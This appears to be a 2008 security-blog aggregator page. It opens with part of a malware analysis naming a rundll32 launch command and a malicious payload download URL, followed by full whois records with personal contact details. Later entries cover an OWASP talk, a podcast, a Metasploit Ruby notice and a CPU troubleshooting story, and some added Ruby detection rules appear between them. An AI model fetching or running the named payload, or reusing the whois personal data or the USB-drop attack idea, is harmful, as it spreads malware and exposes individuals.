rundll32.exe "%temp%\wmoptimizer.dll", RunSetup_Install

svchost.exe uses the classic URLDownloadToFileW and ShellExecuteW to download and execute: http://loansquotesinsurance.com/f/Resident.bin
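The two host-side behaviours described above (a file named svchost.exe dropped outside the system directory, and rundll32.exe loading a DLL from %temp%) are the kind of thing a process-creation log rule can catch. The following is an added example, not code from the SecuriTeam post or from any product: it runs two such rules over constructed sample events whose image paths and command lines are assumptions modelled on the paths in the post (the user name, the AppData temp path and the event shape are invented).

```ruby
# Added example: flag masquerading svchost.exe and rundll32 loading DLLs
# from a temp directory. Events are constructed for illustration only.

# Directories where a genuine svchost.exe legitimately lives (assumed
# default Windows install path).
LEGIT_SVCHOST_DIRS = [
  'c:\windows\system32',
  'c:\windows\syswow64',
].freeze

# Constructed sample process-creation events (image path + command line).
SAMPLE_EVENTS = [
  { image: 'C:\Windows\System32\svchost.exe',
    cmdline: 'C:\Windows\System32\svchost.exe -k netsvcs' },
  { image: 'C:\Program Files\Outlook Express\svchost.exe',
    cmdline: '"C:\Program Files\Outlook Express\svchost.exe"' },
  { image: 'C:\Windows\System32\rundll32.exe',
    cmdline: 'rundll32.exe "C:\Users\alice\AppData\Local\Temp\wmoptimizer.dll", RunSetup_Install' },
  { image: 'C:\Windows\System32\rundll32.exe',
    cmdline: 'rundll32.exe shell32.dll,Control_RunDLL' },
].freeze

# Lower-case and unify separators so comparisons are case-insensitive.
def normalize_path(path)
  path.downcase.tr('/', '\\')
end

# Rule 1: a process named svchost.exe whose directory is not a system dir.
def svchost_masquerade?(image)
  norm = normalize_path(image)
  base = norm.split('\\').last
  dir  = norm.sub(/\\[^\\]*\z/, '')
  base == 'svchost.exe' && !LEGIT_SVCHOST_DIRS.include?(dir)
end

# Matches a "\Temp\" or "\tmp\" path component anywhere in the DLL path.
TEMP_DIR_PATTERN = /\\(temp|tmp)\\/i

# Rule 2: rundll32.exe whose first argument (the DLL) sits in a temp dir.
def rundll32_from_temp?(image, cmdline)
  return false unless normalize_path(image).end_with?('\\rundll32.exe')
  # Strip the executable token (quoted or not) to get the argument string.
  args = cmdline.sub(/\A\s*"?[^"\s]*rundll32\.exe"?\s*/i, '')
  # The DLL is either a quoted path or the text up to the first comma/space.
  dll = args[/\A"([^"]+)"/, 1] || args[/\A([^,\s]+)/, 1]
  !!(dll && dll =~ TEMP_DIR_PATTERN)
end

# Run both rules over a list of events; returns one string per alert.
def scan_events(events)
  events.flat_map do |ev|
    alerts = []
    alerts << "svchost.exe outside system dir: #{ev[:image]}" if svchost_masquerade?(ev[:image])
    alerts << "rundll32 loading DLL from temp: #{ev[:cmdline]}" if rundll32_from_temp?(ev[:image], ev[:cmdline])
    alerts
  end
end

if __FILE__ == $0
  scan_events(SAMPLE_EVENTS).each { |alert| puts alert }
end
```

Run as a script it prints two alerts for the four constructed events: the svchost.exe under Outlook Express and the rundll32 call with the DLL under the user's temp folder. Both rules deliberately key on where a binary runs from rather than on its name or hash, since the dropper here reused a legitimate process name and a fresh file name.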

This is the whois information for http://loansquotesinsurance.com:

Registration Service Provided By: Chinese DQ Network Tech Corp.
Contact: xixipai@hotmail.com

Domain name: loansquotesinsurance.com

Registrant Contact:
Shawn Lee
Shawn Lee

B-902,Zhongxing Huayuan,No.1102,Zhongshan Dadao,Tianhe Distr
Guang Zhou, Guangdong 510660
CN

Administrative Contact:
Shawn Lee
Shawn Lee (webmasters@loansquotesinsurance.com)
+86.02033875805
Fax: +86.02033875805
B-902,Zhongxing Huayuan,No.1102,Zhongshan Dadao,Tianhe Distr
Guang Zhou, Guangdong 510660
CN

Technical Contact:
Shawn Lee
Shawn Lee (webmasters@loansquotesinsurance.com)
+86.02033875805
Fax: +86.02033875805
B-902,Zhongxing Huayuan,No.1102,Zhongshan Dadao,Tianhe Distr
Guang Zhou, Guangdong 510660
CN

The email xixipai@hotmail.com also registers “http://3290.com”

Registration Service Provided By: Chinese DQ Network Tech Corp.
Contact: xixipai@hotmail.com

Domain name: 3290.com

Administrative Contact:
Chinese DQ Network Tech Corp.
Ren XiaoFeng (xixipai@hotmail.com)
+1.05306260800
Fax: +299.05306260803
ZhongHuaDonglu 1038hao
HeZe, 274000
CN

Technical Contact:
Chinese DQ Network Tech Corp.
Ren XiaoFeng (xixipai@hotmail.com)
+1.05306260800
Fax: +299.05306260803
ZhongHuaDonglu 1038hao
HeZe, 274000
CN

Registrant Contact:
Chinese DQ Network Tech Corp.
Ren XiaoFeng

ZhongHuaDonglu 1038hao
HeZe, 274000
CN

Well this is the part where I can only say, if you are reading this and in some kind of cyber police, DO SOMETHING!!!


OWASP Pelting - ha.ckers.org web application security lab

September 25, 2008 02:02 PM

I’m already back in the airport after a long day over at the world OWASP conference in New York. Among other things that were noteworthy was some extremely tacky marketing schwag from the ISC2 folks that says, “I fill the holes in your SLC”. I feel dirty having even typed that. I wish I were kidding. Ridiculous pictures of Dave Aitel wearing said schwag may or may not end up online in the near future. In the meantime, I wanted to do a brief overview on where we are and how things are progressing.

Jeremiah and I gave a brief talk yesterday outlining the timeline of events, and high level concepts of what was going on. We didn’t talk specifics other than some personal remediation advice - yes Lynx is your friend. I felt really lame giving a speech saying I wasn’t giving a speech, trust me. This was not a career highlight, by any stretch. Hence the self flagellation of telling everyone to loose a volley of squishy OWASP balls at me. I missed most of the volley in the picture I took of it, but you can still clearly see several of the OWASP balls in flight:



Jeremiah and I answered quite a few questions from the audience before, during and after the speech, and I’m sure a number of people are already working on their own versions of what they think we’re up to, given that a number of people were quick to tell us they were working on some demo code of some aspects of their interpretation of what we were talking about. I’m sorry to be vague, I really am.

Lastly, we did tell the audience that we will most likely be releasing a whitepaper on the informer’s website of Hackers for Charity prior to doing our full announcement (maybe a week or so before). It’s just a nice thing to do for kids, and we totally support Johnny Long’s efforts. Please sign up. It’s a good cause. If you must know the details and are too cheap to help kids in third world countries or you happen to be a kid in a third world country, I’m sure it will leak out in other ways and we’ll also post the whitepaper publicly later as well.

So, no time line still as of yet, but we are getting regular updates from Adobe and we’re confident they are being as expeditious as they can without risking introducing other issues in the process of issuing their fix. We’ll keep you updated.

Risky Omni(bus)iness #79 — GOVCERT.NL special - Risky Business

September 25, 2008 05:26 AM

This special edition of Risky Business was recorded in Rotterdam, in the Netherlands, at the GOVCERT.NL security conference. The conference organisers flew me there to host a couple of ask the expert sessions and record some custom interviews… but I got to record my own stuff too and prepare this special.

This podcast is essentially a bunch of interviews I did at the conference, glued together for your listening pleasure. Big thanks to our advertiser MessageLabs for making this week’s show possible!

On this week’s show you’ll hear:

  • Marcus Sachs of the Internet Storm Centre (Day job: Verizon) talks supply chain subversion and fun with USB devices. (Hint: Load them up with malware then leave them in the bathrooms of your target…)
  • GovCERT’s Carol Overes talks HoneySpiders — they’re basically client-side honeypots, but they could have some nifty commercial applications.
  • Lance Spitzner looks back at his experience running the Honeynet Project over the years. Honeynets showed some early promise as potential products, ala “bait and switch honeynets”. It never happened, so I asked Lance why.
  • A quick interview with Bart Jacobs, the professor who wound up leading the research team that broke NXP Semiconductors’ MIFARE RFID access cards. The whole thing has actually turned into a political catastrophe that has potential to divert votes away from the incumbent government…

Massive thanks to all the GOVCERT guys — Eelco, Roeland, Tarik and especially Erik de Jong. Apologies if I spelled any of your freakish European names incorrectly… ;) Coming from Australia I know plenty of alcos, but not too many Eelcos!


Metasploit (2**5/10.0) - Metasploit

September 25, 2008 04:29 AM
Silence can mean one of two things - the project is dead, or we are working on some really big things and aren't quite ready to announce them. Well, the project is not dead :-) In the next two weeks, some major changes will be announced that cover the source code, development team, and licensing of the Metasploit Framework. Folks who have been following the development tree may not be surprised, but we are taking some giant steps forward from the 3.1 release.

In the meantime, users should stay away from Ruby 1.8.7. Over the last few months, more and more OS distributions have been upgrading their standard Ruby interpreters from 1.8.5/1.8.6 to 1.8.7. Unfortunately, this version broke the ability to use short-name constants. This type of code is scattered throughout the Metasploit Framework and is tricky to track down. Even knowing what the problem is, there is no clean workaround that doesn't throw out the benefits of using short-name constants in the first place (which are used to make code readable among other things). How can you tell if you hit this bug? The error below is just one example:

[-] Exploit failed: uninitialized constant Msf::ModuleSet::NDR

In the short-term, the framework will display a warning message if the interpreter version matches "1.8.7". Once the Ruby team pushes a new version that incorporates the patch (which is already in the stable development tree), this warning will be removed, and a more complex check will be put in place instead.
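The post describes two stages of check: a short-term gate on the interpreter version string, and a "more complex check" to follow. As an added example (not Metasploit Framework code), here is one way to structure both: a version-string match, plus a feature probe that actually exercises a short-name constant reference and reports whether it resolves. The probed module layout is an assumption chosen for illustration; it does not reproduce the specific lookup that failed on 1.8.7, only the shape of a probe-based check.

```ruby
# Added example: version gate plus feature probe for short-name constants.
# Not the framework's own check; the probed construct is illustrative.

module ProbeOuter
  NDR_PROBE = :resolved          # constant defined in the enclosing module

  module Inner
    # Short-name reference: relies on lexical-scope lookup reaching ProbeOuter.
    def self.lookup
      NDR_PROBE
    end
  end
end

# Feature probe: true when the short-name lookup resolves, false if the
# interpreter raises NameError (the failure class the post's error line shows).
def short_name_constants_work?
  ProbeOuter::Inner.lookup == :resolved
rescue NameError
  false
end

# Coarse gate: does the version string match 1.8.7 (any patch level)?
def version_flagged?(version = RUBY_VERSION)
  !!(version =~ /\A1\.8\.7/)
end

# Returns a warning string, or nil when the interpreter looks fine. The probe
# result is checked first so a broken build is reported whatever its version;
# the version match then covers the known-bad release as the post describes.
def interpreter_warning(version = RUBY_VERSION)
  if !short_name_constants_work?
    "WARNING: Ruby #{version} failed the short-name constant probe"
  elsif version_flagged?(version)
    "WARNING: Ruby #{version} is known to break short-name constants"
  end
end

if __FILE__ == $0
  msg = interpreter_warning
  puts(msg || "Ruby #{RUBY_VERSION}: short-name constants resolve as expected")
end
```

The point of pairing the two is that a version string is a proxy for behaviour: once a patched 1.8.7 build appears, the probe keeps working while the string match would need updating, which is exactly the replacement the post anticipates.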

If anyone is looking for a deeper understanding of the framework and many of the new features, there are still a few seats left in my Powersploitation class at the SecTor 2008 Security Conference. You can tell the class material is fresh when the code it refers to is still being written ;-)

The Case of the Slooooow System - Mark's Blog

September 24, 2008 10:08 AM

A few weeks ago my wife complained that her Vista desktop was not responding to her typing or mouse clicks. Given the importance of the customer, I immediately sat down at the system to troubleshoot.  It wasn’t completely hung, but extremely sluggish. For example, the mouse moved and when I clicked on the start button the start menu opened after about 30 seconds. I suspected that something was hogging the CPU and likely could have resolved the problem simply by logging off or rebooting, but knew that if I didn’t determine the root cause and address it, she’d likely be calling on my technical support services again in the near future. In any case, stooping to that kind of troubleshooting hack is beneath my dignity. I therefore set out to investigate.

My first step was to run Process Explorer to see which process was using the CPU. After a few minutes Process Explorer finally appeared and showed that not one, but two processes were involved, each consuming 50% of the CPU: Iexplore.exe and Dllhost.exe. Iexplore is Internet Explorer (IE) and I suspected that IE itself wasn’t the problem, but that it was a browser helper object (BHO), ActiveX control, or some other plugin loaded into IE. Similarly, Dllhost.exe is the host process for out-of-process COM server DLLs, so it was probably not at fault, but the COM server loaded into it. Both required digging deeper and I decided to tackle IE first.

In order to try and get some CPU headroom in which to operate, I suspended the Dllhost process by selecting it in Process Explorer, right-clicking to open the process context menu, and selecting the Suspend entry:


That put the Dllhost process to sleep and, as I expected, that freed up 50% of the CPU. That’s because the computer was a dual-core system and so to consume 100% of the available CPU cycles a process would have to have two threads, each hogging one of the cores. Most bugs I've seen that result in the CPU being pegged are caused by a single thread.

Processes don’t execute code, threads do, so I needed to look inside the IE process to see what thread or threads were running. I double-clicked on Iexplore.exe in Process Explorer to open its process properties dialog and switched to the Threads page. Several threads were running, but one was dominating the CPU:


From past experience I knew that Ieframe.dll was part of IE, but to be sure I clicked on the modules button on the stack dialog and switched to the Details page of the resulting Shell properties dialog:


The description didn't give me a clue as to the thread's specific purpose, so I moved to the second clue about the thread, its start function. Because I had configured Process Explorer to retrieve symbols for Windows images from the Microsoft symbol server in Options->Configure Symbols, Process Explorer showed the name of the function where each thread began executing. Sometimes the DLL or function where a thread starts executing is enough to identify the thread’s purpose or the software causing a problem. In this case, the thread began in a function named CTablWindow::_TabWindowThreadProc. The function name hints that it’s the one in which the main thread of a tab starts running, but that still wasn’t enough to tell me why the thread was running so much; I needed to dig even deeper and look inside the thread to see where it was executing.

To look at what the thread was up to, I double-clicked on it in the Threads list to open the Thread Stack dialog, which shows the functions on the thread’s stack. A stack is essentially an execution history, where each function listed called the one above it on the list and the function at the top of the list is the one most recently executed by the thread at the time Process Explorer looks at the stack. I scrolled through the list, looking for frames that referenced 3rd-party DLLs or Microsoft IE plugins, since they would be far more likely to have a bug than IE’s own code. Sure enough, I found frames pointing at a popular 3rd-party ActiveX control, Adobe Flash:


Just to be sure that I hadn’t happened to catch Flash running when a different component was using most of the CPU time, I closed and reopened the stack dialog several times, but all of them pointed at Flash.

The first thing I do when I suspect that some software is causing a problem is to check the vendor’s web site to make sure that I have the latest version. I opened the Process Explorer DLL view and looked at Flash.ocx’s version, went to Adobe’s site and looked at the version of the current Flash download, and they were the same. 

I was at a dead end. I couldn’t know for sure if Flash had a bug or, more likely, there was a Flash application that had a bug, nor could I be sure that the problem wouldn’t recur. I tried to determine which site was hosting the Flash content by closing tabs one by one, but when I had closed them all the thread was still running.

At this point the only options I had were to uninstall Flash and leave my wife with a degraded web experience, or terminate IE to stop the current CPU usage and hope that it wouldn’t happen again. I chose the latter and the case remains open. Since investigating this I’ve seen the same Flash behavior again on my wife’s system and on my own, so I have been vigilantly watching the Adobe site for a new version just in case it’s due to a bug in Flash itself. I was disappointed that there was no actionable result of the investigation, but at least I knew what had caused the CPU usage.

I now turned my attention to the Dllhost problem with the hope that I'd meet with better success. Process Explorer lists in a tooltip the component or components loaded into hosting processes like Svchost.exe (the Windows service host process), Rundll32 (the Control Panel applet hosting process), Taskeng.exe (the scheduled task hosting process on Vista and Server 2008), and Dllhost.exe. I moved the mouse over Dllhost.exe to see what COM server it was running:


It was running the Thumbnail Cache COM server, whose job it is to create Explorer thumbnails for image and media files. It is part of Windows, so once again I had to look inside the process for more clues. I resumed the D